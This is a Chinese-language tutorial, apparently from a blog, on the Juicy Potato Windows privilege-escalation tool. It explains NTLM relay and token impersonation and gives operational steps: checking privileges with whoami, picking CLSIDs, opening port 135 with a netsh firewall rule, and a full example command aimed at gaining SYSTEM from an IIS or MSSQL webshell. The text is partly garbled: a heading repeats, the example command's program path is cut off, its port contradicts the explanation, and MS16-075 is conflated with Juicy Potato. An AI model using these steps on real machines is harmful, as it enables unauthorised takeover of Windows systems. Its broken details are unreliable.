2023年6月23日发(作者：)

烂⼟⾖提权Juicypotato原理和利⽤0x00 Potato（烂⼟⾖）提权的原理：所谓的烂⼟⾖提权就是俗称的MS16-075，可以将Windows⼯作站上的权限提升到 NT AUTHORITY SYSTEM – Windows计算机上可⽤的最⾼特权级别。⼀、简单的原理：攻击者可以诱骗⽤户尝试使⽤NTLM对他的计算机进⾏⾝份验证，则他可以将该⾝份验证尝试中继到另⼀台计算机！Microsoft通过使⽤已经进⾏的质询来禁⽌同协议NTLM⾝份验证来对此进⾏修补。这意味着从⼀个主机回到⾃⾝的SMB-> SMB NTLM中继将不再起作⽤。但是，跨协议攻击（例如HTTP-> SMB）仍然可以正常使⽤！⼆、理解流程：1、控制HTTP流量⼤概都流经我们控制的HTTP服务器，做中介⼈攻击。2、可以诱导系统⾼权⽤户执⾏⼀些操作，例如将它们重定向到需要NTLM⾝份验证的地⽅。所有NTLM凭据都将中继到本地SMB侦听器，以创建运⾏⽤户定义的命令的新系统服务，例如是Windows Update服务的请求时，就会是⼀个⾼权令牌，劫持掉这个令牌3、最后模仿这个⾼权令牌。只有具有“模仿安全令牌权限”的账户才能去模仿别⼈的令牌0x01 使⽤⽅法T:>cyPotato v0.1Mandatory args:-t createprocess call: CreateProcessWithTokenW, CreateProcessAsUser, <*> try both-p : program to launch-l : COM server listen portOptional args:-m : COM server listen address (default 127.0.0.1)-a : command line argument to pass to program (default NULL)-k : RPC server ip address (default 127.0.0.1)-n : RPC server listen port (default 135)-c <{clsid}>: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})-z only test CLSID and print token's user1、查看当前⽤户权限，是否符合要求whoami /allwhoami /priv如果开启SeImpersonate权限，juicypotato的参数可以使⽤ -t t如果开启SeAssignPrimaryToken权限，juicypotato的参数可以使⽤ -t u如果均开启，可以选择-t * 如果均未开启，那么⽆法提权2、查看RPC默认端⼝是否为1352、查看RPC默认端⼝是否为135如果被修改(例如为111)，juicypotato的参数可以使⽤ -n 111

如果系统禁⽤了RPC，并不是⼀定⽆法提权，需要满⾜如下条件：找到另⼀系统，能够以当前⽤户的权限进⾏远程RPC登录，此时juicypotato的参数可以使⽤-k例如Win7、WIn8系统，默认配置下，允许135端⼝的⼊站规则即可进⾏远程RPC登录添加防⽕墙规则允许135端⼝⼊站的命令如下：netsh advfirewall firewall add rule name="135" protocol=TCP dir=in localport=135 action=allow3、根据操作系统选择可⽤的CLSID例如测试系统win7 ，选择CLSID为 {555F3418-D99E-4E51-800A-6E89CFD8B1D7}4、选择⼀个系统未占⽤的端⼝作为监听端⼝最终语句： -t t -p c: -l 1155 -c {8BC3F05E-D86B-11D0-A075-00C04FB68820}表⽰开启SeImpersonate权限创建进程，监听端⼝1111，使⽤的CLSID为{8BC3F05E-D86B-11D0-A075-00C04FB68820}0x02 限制条件经过以上的分析，Juicy Potato的限制条件如下：需要⽀持SeImpersonate或者SeAssignPrimaryToken权限开启DCOM本地⽀持RPC或者远程服务器⽀持PRC并能成功登录能够找到可⽤的COM对象⼀般从web拿到的webshell都是IIS服务器权限，是具有这个模仿权限的。⼀般⼤多数的服务型账户IIS、MSSQL等，有这个权限，⼤多数⽤户级的账户没有这个权限，这些都可以whoami /priv 试⼀下看看有没有模仿权限。__EOF__